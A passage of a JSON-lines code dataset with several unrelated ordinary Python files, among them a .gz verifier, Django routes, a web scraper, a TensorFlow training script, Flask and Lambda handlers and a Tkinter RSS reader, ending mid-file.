+{"seq_id":"525501917","text":"\"\"\"\n///////////////////////////////////////////////////////\n│\t\n│\tFilename:\tautomate_1_verify_gz.py\n│\tDescription:\n│\tTo verify the integrity of .gz files in directory\n│\tand print the corrupted ones' file names.\n│\t==================================================\n│\tAuthorship:\t@cgneo\n│\tCopyright:\tModified BSD License.\n│\tMade with love by https://github.com/cgneo\n│\t\n///////////////////////////////////////////////////////\n\"\"\"\n\n\nimport os\nimport gzip\nfrom auto_print_progress import 
printProgressBar\n\n\n\"\"\"\n│\t(optional):\n│\tPlease choose the directory containing .gz files for database:\n│\tFor example:\n│\tdirectory = './hgtdb'\n\"\"\"\n#============================================================\ndirectory = './'\n#============================================================\nsuccess = 0\nfailed = 0\nall_file = 0\nlist_of_files = []\nfor root, subdirectories, files in os.walk(directory):\n\tsubdirectories.sort()\n\tfor file in files:\n\t\tname, extension = os.path.splitext(file)\n\t\tif extension == '.gz':\n\t\t\tlist_of_files.append(os.path.join(root, file))\n\nprint(f'Finished scanning: {len(list_of_files)} .gz files in total.')\n\n\nfor i in range(len(list_of_files)):\n\tline_count_test = 0\n\ttry:\n\t\tfin = gzip.open(list_of_files[i], 'rt')\n\t\tfor line in fin:\n\t\t\tline_count_test += 1\n\t\t\tif line_count_test >= 2: break\n\t\tsuccess += 1\n\texcept Exception as e:\n\t\tfailed += 1\n\t\t# report the file that actually failed, not the stale loop variable from the walk above\n\t\tprint(f'failed at {list_of_files[i]}: {e}')\n\t\n\tall_file += 1\n\tprintProgressBar(i+1, len(list_of_files), prefix='Progress:', suffix=list_of_files[i], length=30)\n\nprint()\nprint(f'Success: {success}/{all_file}, Failed: {failed}/{all_file}')","sub_path":"automate_1_verify_gz.py","file_name":"automate_1_verify_gz.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"85167187","text":"from django.conf.urls import patterns, include, url\nfrom adm.empresa.views import *\nfrom adm.endereco.views import ListEstadoView, CreateEstadoView, UpdateEstadoView, DeleteEstadoView, ListCidadeView, \\\n CreateCidadeView, UpdateCidadeView, DeleteCidadeView\n\n__author__ = 'mattyws'\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'VoteCompras.views.home', name='home'),\n url(r'^estado/$', ListEstadoView.as_view(), name='estados'),\n url(r'^estado/form/$', CreateEstadoView.as_view(), name='adicionar_estado'),\n url(r'^estado/form/(?P<pk>[0-9]+)/$', UpdateEstadoView.as_view(), name='editar_estado'),\n url(r'^estado/delete/(?P<pk>[0-9]+)/$', DeleteEstadoView.as_view(), name='deletar_estado'),\n)\n\nurlpatterns += patterns('',\n # Examples:\n # url(r'^$', 'VoteCompras.views.home', name='home'),\n url(r'^cidade/$', ListCidadeView.as_view(), name='cidades'),\n url(r'^cidade/form/$', CreateCidadeView.as_view(), name='adicionar_cidade'),\n url(r'^cidade/form/(?P<pk>[0-9]+)/$', UpdateCidadeView.as_view(), name='editar_cidade'),\n url(r'^cidade/delete/(?P<pk>[0-9]+)/$', DeleteCidadeView.as_view(), name='deletar_cidade'),\n)","sub_path":"adm/endereco/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"257205889","text":"\n# Scrape product data from JD.com\n# ---- mismatched encodings are a nightmare: the detail pages are gbk while the search page is utf-8\n\nimport codecs \nfrom lxml import etree\nfrom urllib import request\nimport urllib\n\ndef getDetail(url):\n print(url)\n page=request.urlopen(url).read().decode('gbk')\n tree=etree.HTML(page)\n table=tree.xpath('//div[@id=\"product-detail-2\"]/table/tr')\n for table_tr in table:\n tr=table_tr.getchildren()\n if len(tr)==1:\n print(tr[0].text)\n elif len(tr)==2:\n print(tr[0].text,' ',tr[1].text)\n\ndef start():\n url='http://search.jd.com/Search?keyword=%E6%89%8B%E6%9C%BA&enc=utf-8&wq=%E6%89%8B%E6%9C%BA&pvid=8k7efomi.57bjs'\n page=request.urlopen(url).read().decode('utf-8')\n tree=etree.HTML(page)\n\n nodes=tree.xpath(\"//div[@class='gl-i-wrap']\")\n\n item_list=[]\n for node in nodes:\n try:\n            
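# each 'gl-i-wrap' node is one search-result card: pull its link, title, and price\n            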
href=node.xpath(\"./div/a\")[0].attrib['href']\n name=node.xpath(\"./div/a/em\")[0].text\n # not sure why, but some prices never appear in the raw page source even though the element inspector shows them\n # one clear pattern: the items that raise errors all have hrefs starting with http://, unlike the normal ones\n price=node.xpath(\"./div/strong/i\")[0].text\n\n item_list.append((name,price,href))\n except:\n print('there is an error')\n return item_list\n \n \n \nif __name__ == '__main__':\n item_list=start()\n for (n,p,h) in item_list:\n print(n,p,h)\n '''\n try:\n getDetail(h)\n except:\n print('read url failed or decode failed!')\n '''\n url=\"http:\"+h\n getDetail(url)\n print('----------------------------------------------world peace-----------------------------------------------------------------')","sub_path":"jingdong-total.py","file_name":"jingdong-total.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"625005253","text":"def conversor(n1,n2):\n if n1 > 24 or n2 > 59 or n1 < 0 or n2 < 0:\n n1 = -1\n n2 = -1\n conv = \"Invalid time!\"\n elif n1 < 12 or n1 == 24:\n if n1 == 24:\n n1 = 0\n conv = \"AM\"\n else:\n conv = \"PM\"\n if n1 > 12:\n n1 -= 12\n return (n1,n2,conv)\nh = None\nwhile h != -1:\n h = int(input(\"Enter the hour: \"))\n m = int(input(\"Enter the minutes: \"))\n a,b,c = conversor(h,m)\n if a == -1:\n print(c)\n else:\n print(\"%i:%i %s\" %(a,b,c))\n \n\n","sub_path":"backup/Ignorância Zero-backup/Ignorância Zero/033Exercício6.py","file_name":"033Exercício6.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"627669426","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.slim.python.slim.nets.inception_v2 import inception_v2\nfrom tensorflow.contrib.slim.python.slim.nets.inception_v2 import inception_v2_arg_scope as inception_v2_arg_scope\nfrom generate_batch import generate_stochastic_train_batch, generate_stochastic_valid_batch, generate_stochastic_test_batch\n\n\nclass transferLearningModel:\n def __init__(self):\n self.using_inception = True\n self.train_picture = 21303\n self.height = 224\n self.width = 224\n self.batch_size = 50\n self.label_num = 102\n self.learning_rate = 0.0001\n self.w_len = 1001\n self.fc_len = 256\n self.onehot = self.generatelabel()\n self.max_acc_save = 0\n self.is_training = tf.placeholder(tf.bool, name='is_training')\n self.is_from_previous = False\n\n self.img_input = tf.compat.v1.placeholder(dtype=tf.float32, shape=[None, self.height, self.width, 3], name='input')\n #self.img_input_expand = tf.expand_dims(self.img_input, -1)\n self.img_input_expand = self.img_input\n self.label_id = tf.compat.v1.placeholder(dtype=tf.int32, shape=[None], name='label')\n self.label_onehot = tf.nn.embedding_lookup(self.onehot, self.label_id)\n self.keep_prob = tf.compat.v1.placeholder(tf.float32, name='keep_prob')\n\n if self.using_inception:\n self.feature_vector = self.inception_v2_layer() # feature vector\n else:\n self.feature_vector = self.vgg_layer()\n self.full_connect_out = self.full_connect_layer() # used to produce the hash code and the classification\n self.output_class = self.softmax_layer() # classification result\n self.output_hash = self.hash_layer() # hashing result\n\n self.loss = self.get_loss()\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(self.output_class, 1), tf.argmax(self.label_onehot, 1)), tf.float32), name=\"my_accuracy\")\n\n self.optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate)\n if self.using_inception:\n update_ops 
= tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.train_op = self.optimizer.minimize(self.loss)\n else:\n self.train_op = self.optimizer.minimize(self.loss)\n self.saver = tf.compat.v1.train.Saver()\n\n inception_except_logits = slim.get_variables_to_restore(exclude=['Inceptionv2/Logits','Inceptionv2/AuxLogits'])\n self.loaded_weights = slim.assign_from_checkpoint_fn(\"models/inception_v2.ckpt\", inception_except_logits, ignore_missing_vars=True)\n # self.loaded_weights = slim.assign_from_checkpoint_fn(\"models/inception_v2.ckpt\",inception_except_logits)\n self.summ = tf.norm(self.output_class,ord=1)\n self.the_class = tf.argmax(self.output_class,1)\n\n\n def generatelabel(self):\n return np.identity(self.label_num)\n\n def inception_v2_layer(self):\n out_dimension = self.w_len\n with slim.arg_scope(inception_v2_arg_scope()):\n out, _ = inception_v2(inputs=self.img_input_expand, num_classes=out_dimension,\n dropout_keep_prob=self.keep_prob,is_training=self.is_training)\n return out\n\n def vgg_layer(self):\n conv1 = self.conv_layer([3,3,1,64],[64],self.img_input_expand,1) #222*222*64\n conv2 = self.conv_layer([3,3,64,64],[64],conv1,2) ##220*220*64\n pool1 = tf.nn.max_pool(conv2, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID') #110*110*64\n conv2 = self.conv_layer([3, 3, 64, 128], [128], pool1, 3) #108*108*128\n conv4 = self.conv_layer([3,3,128,128],[128], conv2, 4) #106*106*128\n pool2 = tf.nn.max_pool(conv4, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')#53*53*128\n conv5 = self.conv_layer([3,3,128,256],[256],pool2, 5) #51*51*256\n conv6 = self.conv_layer([3,3,256,256],[256], conv5, 6) #49*49*256\n pool3 = tf.nn.max_pool(conv6, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # 25*25*256\n conv7 = self.conv_layer([3, 3, 256, 256], [256], pool3, 5) # 23*23*256\n conv8 = self.conv_layer([3, 3, 256, 256], [256], conv7, 6) # 21*21*256\n pool4 = tf.nn.max_pool(conv8, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # 11*11*256\n conv9 = self.conv_layer([3, 3, 256, 256], [256], pool4, 5) # 9*9*256\n conv10 = self.conv_layer([3, 3, 256, 256], [256], conv9, 6) # 7*7*256\n pool5 = tf.nn.max_pool(conv10, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # 4*4*256\n\n flat = tf.reshape(pool5,[-1,4*4*256])\n wfc = self.get_variable([4*4*256,1000],\"vgg_fc_w\")\n bfc = self.get_variable([1000], \"vgg_fc_b\")\n out = tf.nn.relu(tf.matmul(flat, wfc)+bfc)\n return out\n\n\n def conv_layer(self,wshape,bshape,input,num):\n W = self.get_variable(wshape, \"conv_w\"+str(num))\n b = self.get_variable(bshape, \"conv_b\"+str(num))\n h = tf.nn.relu(tf.nn.conv2d(input, W, strides=[1, 1, 1, 1], padding='VALID') + b);\n h_dropout = tf.nn.dropout(h, keep_prob=self.keep_prob)\n return h_dropout\n\n def get_variable(self,shape,name):\n return tf.Variable(initial_value=tf.random.truncated_normal(shape,mean=0,stddev=0.01),name=name)\n\n def full_connect_layer(self):\n W_fc = tf.Variable(initial_value=tf.random.truncated_normal([self.w_len, self.fc_len], mean=0, stddev=0.01),name=\"full_connect_w\");\n b_fc = tf.Variable(initial_value=tf.random.truncated_normal([self.fc_len], mean=0, stddev=0.01),name=\"full_connect_b\");\n h_fc = tf.tanh(tf.matmul(self.feature_vector, W_fc) + b_fc);\n h_fc1_dropout = tf.nn.dropout(h_fc, self.keep_prob, name=\"feature_vector\");\n return h_fc1_dropout\n\n def hash_layer(self):\n pass\n\n def softmax_layer(self):\n W_s = tf.Variable(initial_value=tf.random.truncated_normal([self.fc_len, self.label_num], 
mean=0, stddev=0.01));\n b_s = tf.Variable(initial_value=tf.random.truncated_normal([self.label_num], mean=0, stddev=0.01));\n h_s= tf.nn.softmax(tf.matmul(self.full_connect_out, W_s) + b_s, name=\"out_class\");\n return h_s\n\n def get_loss(self):\n #alpha = 0.01\n cross_entropy = tf.compat.v1.losses.softmax_cross_entropy(onehot_labels=self.label_onehot, logits=self.output_class)\n #full_connect_output_norm = tf.norm(self.full_connect_out,axis=1)\n #tf.compat.v1.losses.add_loss(tf.reduce_mean(62-full_connect_output_norm)*alpha)\n tf.compat.v1.losses.add_loss(cross_entropy)\n return tf.compat.v1.losses.get_total_loss(add_regularization_losses=True)\n\n def train(self,):\n max_epoch = 10000\n with tf.compat.v1.Session() as sess:\n if self.is_from_previous:\n module_file = tf.compat.v1.train.latest_checkpoint(\"models/\")\n self.saver.restore(sess, module_file)\n max_accuracy = 0.4\n else:\n sess.run(tf.compat.v1.global_variables_initializer())\n max_accuracy = 0\n self.loaded_weights(sess)\n for i in range(1, max_epoch):\n train_batch = generate_stochastic_train_batch(self.batch_size, True)\n for step,batch in enumerate(train_batch):\n (img_batch, label_batch) = batch\n sess.run(self.train_op, feed_dict={self.img_input:img_batch, self.label_id: label_batch, self.keep_prob:0.7, self.is_training:False})\n\n if step%100 ==0:\n valid_accuracy,valid_loss = self.valid(sess)\n\n if valid_accuracy > max_accuracy:\n max_accuracy = valid_accuracy\n if valid_accuracy > 0.2 and valid_accuracy - self.max_acc_save >= 0.02:\n self.max_acc_save = max_accuracy\n best_models = \"models/best_models_{}_{}_{:.4f}_{}_{}.ckpt\".format(i,step, max_accuracy,self.w_len,self.fc_len)\n print('------save:{}'.format(best_models))\n self.max_acc_save = max_accuracy\n self.saver.save(sess,best_models)\n print(\"epoch: {} step: {} accuracy: {} max accuracy: {} loss:{}\".format(i, step, valid_accuracy, max_accuracy, valid_loss))\n\n def valid(self, sess):\n valid_batch = generate_stochastic_valid_batch(self.batch_size, True)\n valid_accuracy = []\n valid_loss = []\n for batch in valid_batch:\n (v_img_batch, v_label_batch) = batch\n acc = sess.run(self.accuracy,\n feed_dict={self.img_input: v_img_batch, self.label_id: v_label_batch,\n self.keep_prob: 1, self.is_training:False})\n valid_accuracy.append(acc)\n valid_loss.append(sess.run(self.loss, feed_dict={self.img_input: v_img_batch, self.label_id: v_label_batch, self.keep_prob: 1,self.is_training:False}))\n\n mean_acc = np.array(valid_accuracy, dtype=np.float32).mean()\n mean_loss = np.array(valid_loss, dtype=np.float32).mean()\n return mean_acc,mean_loss\n\ndef test():\n model_path = \"models/best_models_69_100_0.9431_1001_256.ckpt\"\n saver = tf.train.import_meta_graph(model_path+\".meta\") # 加载图结构\n graph = tf.get_default_graph()\n # tensor_name_list = [tensor.name for tensor in graph.as_graph_def().node]\n # with open(\"name.txt\",'w+')as f:\n # for n in tensor_name_list:\n # f.write(n+\"\\n\")\n img_input = graph.get_tensor_by_name(\"input:0\")\n label_id = graph.get_tensor_by_name(\"label:0\")\n keep_prob = graph.get_tensor_by_name(\"keep_prob:0\")\n accuracy = graph.get_tensor_by_name(\"my_accuracy:0\")\n is_train = graph.get_tensor_by_name(\"is_training:0\")\n test_batch = generate_stochastic_test_batch(100, False)\n test_accuracy = []\n with tf.Session() as sess:\n #ckpt = tf.train.get_checkpoint_state('models/')\n saver.restore(sess,\"models/best_models_69_100_0.9431_1001_256.ckpt\")\n for batch in test_batch:\n (v_img_batch, v_label_batch) = batch\n acc = 
sess.run(accuracy, feed_dict={img_input: v_img_batch, label_id: v_label_batch,\n keep_prob: 1, is_train: False})\n test_accuracy.append(acc)\n print(acc)\n #valid_loss.append(sess.run(self.loss, feed_dict={self.img_input: v_img_batch, self.label_id: v_label_batch, self.keep_prob: 1}))\n\n mean_acc = np.array(test_accuracy, dtype=np.float32).mean()\n # mean_loss = np.array(valid_loss, dtype=np.float32).mean()\n print(mean_acc)\n\n# t = transferLearningModel()\n# t.train()\ntest()","sub_path":"transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":10888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"198514733","text":"from flask import Flask, render_template, request\nimport requests\nimport datetime\n\napp=Flask(__name__)\n\n\n@app.route(\"/\")\ndef search():\n return render_template(\"building_permit_search.html\", geocode=\"\", date_value=\"01/01/2020 - 01/15/2020\", initial_page=True)\n\n@app.route(\"/search\", methods=[\"POST\",\"GET\"]) \ndef after_searching():\n js_data=\"\"\n dateRange=\"01/01/2020 - 01/15/2020\"\n if request.method==\"POST\":\n dateRange=request.form.get(\"daterange\")\n dates=dateRange.split(\"-\")\n start_date,end_date=dates[0].strip(),dates[1].strip()\n start_date_format=\"'\"+str(datetime.datetime.strptime(start_date, '%m/%d/%Y').date())+\"'\"\n end_date_format=\"'\"+str(datetime.datetime.strptime(end_date, '%m/%d/%Y').date())+\"'\"\n print(\"start date:\",start_date_format)\n print(\"end date:\",end_date_format)\n res = requests.get(\"https://data.calgary.ca/resource/c2es-76ed.geojson\",\\\n params={\"$where\": \"issueddate > \"+start_date_format+\" and issueddate < \"+end_date_format})\n # \"$select\":\"issueddate, workclassgroup, contractorname, communityname, originaladdress,latitude,longitude\"})\n # print(\"status code=\", res.status_code)\n # print(\"data=\", res.json())\n \n if res.status_code==200:\n js_data=res.json()\n else:\n js_data=\"\"\n \n return render_template(\"building_permit_search.html\",geocode=js_data,date_value=dateRange, initial_page=False)\n\nif __name__== \"__main__\" :\n app.run(debug=True)","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"381784895","text":"from __future__ import print_function # Python 2/3 compatibility\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nimport time\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb')\n players = dynamodb.Table('players')\n games = dynamodb.Table('games')\n \n datetime = int(time.time()*1000)\n # return(event)\n item = {\n \"name\": event['body']['name'],\n \"score\": 1500,\n \"id\": datetime,\n \n };\n players.put_item(Item=item)\n \n # Get everything and return \n player_entries = players.scan(\n FilterExpression=Attr('id').gt(0)\n )\n game_entries = games.scan(\n FilterExpression=Attr('id').gt(0)\n )\n \n return {\n 'players': player_entries,\n 'games': game_entries\n }","sub_path":"lamdas/update_players.py","file_name":"update_players.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"23523520","text":"#encoding: utf-8\r\nfrom tkinter import *\r\nfrom tkinter.ttk import Progressbar, Style\r\nfrom tkinter import tix\r\nfrom PIL import Image, ImageFont, ImageDraw, ImageTk, ImageOps\r\nfrom threading import 
Thread\r\nimport queue\r\nimport sys\r\nimport random\r\nimport webbrowser\r\nimport time\r\n\r\nimport localFluxs\r\nimport urls\r\nimport tools\r\nimport editurlsUI\r\n\r\nclass Entrie:\r\n def __init__(self, domain, name, link, summary, date, enclosure):\r\n self.name = name\r\n self.link = link\r\n self.date = tools.dateFromString(date)\r\n self.enclosure = enclosure\r\n self.dateString = \"Le \" + str(self.date.day) + \" \" + tools.numberToMonth(self.date.month) + \" \" + str(self.date.year) + \" à \" + str(self.date.hour) + \"h\" + str(self.date.minute)\r\n self.summary = summary[ 0 : 0 + 300]\r\n self.summary = self.summary.replace(\"\\n\", \"\")\r\n if self.summary == \"\":\r\n self.summary = \"Pas de description...\"\r\n self.enclosurePath = '../datas/fluxs/' + domain + \"/\" + self.enclosure\r\n\r\n def click(self, event):\r\n openBrowser(self.link)\r\n\r\nclass MainWindow(Canvas):\r\n def __init__(self):\r\n super().__init__()\r\n self.entries = localFluxs.getListOfEntries()\r\n\r\n #self.window_W = root.winfo_screenwidth() // problem with two screen on xfce\r\n self.window_W = 1080\r\n #self.window_Y = root.winfo_screenheight()\r\n self.window_Y = 720\r\n\r\n self.colors = {}\r\n self.colors[\"background\"] = \"#1a1a1a\",\r\n self.colors[\"newsTitle\"] = \"#ffffff\"\r\n self.colors[\"entrieTitle\"] = \"#ffffff\"\r\n self.colors[\"entrieInfos\"] = \"#808080\"\r\n self.colors[\"entrieBorder\"] = \"#00b4c4\"\r\n self.colors[\"menuBackground\"] = \"#2e2e2e\",\r\n self.colors[\"menuActiveBackground\"] = \"#1a1a1a\",\r\n self.colors[\"menuForeground\"] = \"#ffffff\",\r\n self.colors[\"menuActiveForeground\"] = \"#00b4c4\"\r\n self.colors[\"progBarBG\"] = \"#ffffff\"\r\n self.colors[\"progBarFG\"] = \"#00b4c4\"\r\n\r\n self.scrollCount = 0\r\n self.initUI()\r\n\r\n def secondaire(self):\r\n topEditUrl = Toplevel()\r\n editurlsUI.MainWindow(topEditUrl)\r\n\r\n def initUI(self):\r\n self.master.tk.call('wm', 'iconphoto', self.master._w, PhotoImage(file='../res/imgs/icon.png'))\r\n self.master.grid_rowconfigure(0, weight=1)\r\n self.master.grid_columnconfigure(0, weight=1)\r\n self.master.title('HandFeeder')\r\n\r\n ###### MENU\r\n menubar = Menu(self.master,\r\n font = \"OpenSans 13 bold\",\r\n background=self.colors[\"menuBackground\"],\r\n activebackground=self.colors[\"menuActiveBackground\"],\r\n foreground=self.colors[\"menuForeground\"],\r\n activeforeground=self.colors[\"menuActiveForeground\"]\r\n )\r\n self.master.config(menu=menubar)\r\n\r\n feedsMenu = Menu(menubar,\r\n font = \"OpenSans 13 bold\",\r\n background=self.colors[\"menuBackground\"],\r\n activebackground=self.colors[\"menuActiveBackground\"],\r\n foreground=self.colors[\"menuForeground\"],\r\n activeforeground=self.colors[\"menuActiveForeground\"]\r\n )\r\n feedsMenu.add_command(label=\"Actualize\", command=self.actualize)\r\n feedsMenu.add_command(label=\"Feeds...\", command=self.secondaire)\r\n menubar.add_cascade(label=\"Settings\", menu=feedsMenu)\r\n ###### END MENU\r\n\r\n # Canvas qui fait \"cadre\"\r\n self.win = Canvas(self.master, \r\n width = self.window_W, \r\n height = self.window_Y, \r\n background = self.colors[\"background\"],\r\n highlightbackground = self.colors[\"background\"],\r\n highlightcolor = self.colors[\"background\"]\r\n )\r\n self.win.grid(row=0, column=0, sticky='nswe')\r\n # Scroll\r\n self.win.bind_all(\"\", self.on_mousewheel) # WINDOWS\r\n self.win.bind_all('<4>', self.on_mousewheel) # LINUX\r\n self.win.bind_all('<5>', self.on_mousewheel) # LINUX\r\n\r\n # scrollbars\r\n hScroll 
= Scrollbar(self.master, orient=HORIZONTAL, command=self.win.xview)\r\n hScroll.grid(row=1, column=0, sticky='we')\r\n\r\n vScroll = Scrollbar(self.master, orient=VERTICAL, command=self.win.yview)\r\n vScroll.grid(row=0, column=1, sticky='ns')\r\n\r\n self.win.configure(xscrollcommand=hScroll.set, yscrollcommand=vScroll.set)\r\n\r\n # frame des entrées\r\n self.entriesFrame = self.updateEntries()\r\n\r\n # création de la window dans le canvas\r\n self.win.create_window(0, 0, window=self.entriesFrame, anchor=NW)\r\n\r\n # scrollregion sur toute la taille du canvas\r\n self.win.configure(scrollregion=self.win.bbox(ALL))\r\n\r\n #resize\r\n self.win.bind('', self.resize)\r\n\r\n def resize(self, event):\r\n w,h = event.width, event.height\r\n\r\n self.win.config(width=w, height=h)\r\n self.window_W=w\r\n self.window_Y=h\r\n\r\n self.entriesFrame.destroy()\r\n self.entriesFrame = self.updateEntries()\r\n self.win.create_window(0, 0, window=self.entriesFrame, anchor=NW)\r\n\r\n # scrollregion sur toute la taille du canvas\r\n self.win.configure(scrollregion=self.win.bbox(ALL)) \r\n\r\n def actualize(self):\r\n # show loading animation\r\n self.loadingAnimation()\r\n # start thread for updating\r\n self.queue = queue.Queue()\r\n UpdateThread(self.queue).start()\r\n # check if actualize finished\r\n self.master.after(100, self.isActualizeFinished)\r\n\r\n def loadingAnimation(self):\r\n self.entriesFrame.destroy()\r\n self.entriesFrame = Frame(\r\n self.win, \r\n bg=self.colors[\"background\"]\r\n )\r\n Label(self.entriesFrame, bg=self.colors[\"background\"]).pack() # For space\r\n news_title = Label(self.entriesFrame,\r\n text = \"Loading...\",\r\n font = \"OpenSans 25 bold\",\r\n fg=self.colors[\"newsTitle\"],\r\n bg=self.colors[\"background\"])\r\n news_title.pack(padx=80)\r\n Label(self.entriesFrame, bg=self.colors[\"background\"]).pack() # For space\r\n\r\n barStyle = Style()\r\n barStyle.configure(\"bar.Horizontal.TProgressbar\", \r\n troughcolor=self.colors[\"progBarBG\"],\r\n bordercolor=self.colors[\"progBarBG\"],\r\n background=self.colors[\"progBarFG\"],\r\n lightcolor=self.colors[\"progBarFG\"],\r\n darkcolor=self.colors[\"progBarFG\"]\r\n )\r\n self.prog_bar = Progressbar(\r\n self.entriesFrame, \r\n style=\"bar.Horizontal.TProgressbar\",\r\n orient=\"horizontal\",\r\n length=200, \r\n mode=\"indeterminate\"\r\n )\r\n self.prog_bar.pack(padx=80)\r\n self.prog_bar.start()\r\n\r\n self.entriesFrame.update()\r\n self.win.create_window(0, 0, window=self.entriesFrame, anchor=NW)\r\n self.win.configure(scrollregion=self.win.bbox(ALL))\r\n \r\n def isActualizeFinished(self):\r\n try:\r\n # except if not finished\r\n msg = self.queue.get(0)\r\n\r\n # print new entries\r\n self.entriesFrame.destroy()\r\n self.entries = localFluxs.getListOfEntries()\r\n self.entriesFrame = self.updateEntries()\r\n self.win.create_window(0, 0, window=self.entriesFrame, anchor=NW)\r\n self.win.configure(scrollregion=self.win.bbox(ALL))\r\n except queue.Empty:\r\n # check if actualize finished\r\n self.master.after(100, self.isActualizeFinished)\r\n\r\n def updateEntries(self):\r\n entriesFrame = Frame(\r\n self.win, \r\n bg=self.colors[\"background\"]\r\n )\r\n\r\n #newsTitle\r\n Label(entriesFrame, bg=self.colors[\"background\"]).pack() # For space\r\n news_title = Label(entriesFrame,\r\n text = \"Latest news\",\r\n font = \"OpenSans 25 bold\",\r\n fg=self.colors[\"newsTitle\"],\r\n bg=self.colors[\"background\"])\r\n news_title.pack(padx=\"80\")\r\n Label(entriesFrame, bg=self.colors[\"background\"]).pack() # 
For space\r\n\r\n # remplissage avec les articles\r\n for i in range(len(self.entries)):\r\n #Create entrie obj\r\n entrie = Entrie(self.entries[i][\"domain\"], self.entries[i][\"title\"], self.entries[i][\"link\"], self.entries[i][\"summary\"], self.entries[i][\"date\"], self.entries[i][\"enclosure\"])\r\n\r\n # Entrie frame\r\n entrie_frame = Frame(entriesFrame, width=self.window_W-80, height=140)\r\n entrie_frame.config(\r\n bg=self.colors[\"background\"]\r\n )\r\n entrie_frame.bind(\"\", entrie.click)\r\n\r\n #enclosure\r\n if entrie.enclosure != \"\":\r\n load = Image.open(entrie.enclosurePath)\r\n #load = load.thumbnail((140, 140), Image.ANTIALIAS)\r\n load = ImageOps.fit(load, (140, 140), Image.ANTIALIAS)\r\n render = ImageTk.PhotoImage(load)\r\n entrie_enclosure = Label(entrie_frame, \r\n image=render\r\n )\r\n entrie_enclosure.image = render\r\n entrie_enclosure.place(x=0, y=0)\r\n\r\n #title\r\n entrie_title = Label(entrie_frame,\r\n text=entrie.name,\r\n font = \"OpenSans 18 bold\",\r\n fg=self.colors[\"entrieTitle\"],\r\n bg=self.colors[\"background\"])\r\n entrie_title.bind(\"\", entrie.click)\r\n entrie_title.place(x=160, y=15)\r\n\r\n #source\r\n entrie_source = Label(entrie_frame,\r\n text=tools.domainOfUrl(entrie.link),\r\n font = \"OpenSans 15 bold\",\r\n fg=self.colors[\"entrieInfos\"],\r\n bg=self.colors[\"background\"])\r\n entrie_source.bind(\"\", entrie.click)\r\n entrie_source.place(x=160, y=45)\r\n\r\n #date\r\n entrie_date = Label(entrie_frame,\r\n text=entrie.dateString,\r\n font = \"OpenSans 13 bold\",\r\n fg=self.colors[\"entrieInfos\"],\r\n bg=self.colors[\"background\"])\r\n entrie_date.bind(\"\", entrie.click)\r\n entrie_date.place(x=160, y=70)\r\n\r\n #summary\r\n entrie_desc = Label(entrie_frame,\r\n text=entrie.summary,\r\n font = \"OpenSans 15 bold\",\r\n fg=self.colors[\"entrieInfos\"],\r\n bg=self.colors[\"background\"])\r\n entrie_desc.bind(\"\", entrie.click)\r\n entrie_desc.place(x=160, y=95)\r\n\r\n Label(entriesFrame, bg=self.colors[\"background\"], font = \"OpenSans 1 bold\").pack() # For space\r\n # End entrie frame\r\n entrie_frame.pack(padx=40, pady=20)\r\n\r\n # calcul des dimensions\r\n entriesFrame.update()\r\n return entriesFrame\r\n\r\n def on_mousewheel(self, event):\r\n if event.num == 5 or event.delta == -120:\r\n self.win.yview_scroll(1, UNITS)\r\n if event.num == 4 or event.delta == 120:\r\n self.win.yview_scroll(-1, UNITS)\r\n\r\nclass UpdateThread(Thread):\r\n def __init__(self, queue):\r\n Thread.__init__(self)\r\n self.queue = queue\r\n def run(self):\r\n localFluxs.updateLocalFile()\r\n self.queue.put(\"Update finished\")\r\n\r\ndef openBrowser(url):\r\n print(url)\r\n webbrowser.open(url)\r\n\r\nroot = Tk()\r\napp = MainWindow()\r\nroot.mainloop()\r\n","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"601293767","text":"import json\r\nimport os\r\nimport time\r\nimport uuid\r\nfrom pprint import pprint\r\n\r\nimport boto3\r\nfrom botocore.exceptions import ClientError\r\n\r\nfrom modules.db import DB\r\nfrom modules.utils import GcpOcr\r\n\r\n\r\nclass FSSAI:\r\n\r\n def __init__(self,refid,env = \"quality\"):\r\n\r\n self.timeBwPage = 0.5\r\n\r\n assert env == \"quality\" or env == \"prod\", (\"env value should be either quality or prod\")\r\n self.env = env\r\n self.screenshotDir = os.path.join(os.getcwd(), \"Screenshots\")\r\n self.ocr = GcpOcr(\"gcp.json\")\r\n 
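# read config_{env}.json, wire up S3 for screenshot uploads, and open the logging database\r\n        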
